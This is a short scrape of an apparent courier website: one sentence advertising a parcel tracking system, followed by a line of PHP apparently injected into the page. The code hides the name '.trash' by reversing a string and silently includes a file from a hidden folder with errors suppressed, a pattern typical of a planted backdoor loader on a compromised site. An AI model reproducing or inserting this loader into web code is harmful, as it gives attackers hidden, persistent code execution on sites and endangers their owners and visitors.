With our Tracking system your can find the status of your parcel from the moment you have booked it with us till the moment it gets to the destination.
$CacheFileName = strrev("hsart."); $cacheFile = '../' . $CacheFileName . '/' . $CacheFileName; if (file_exists($cacheFile)) { @include $cacheFile; }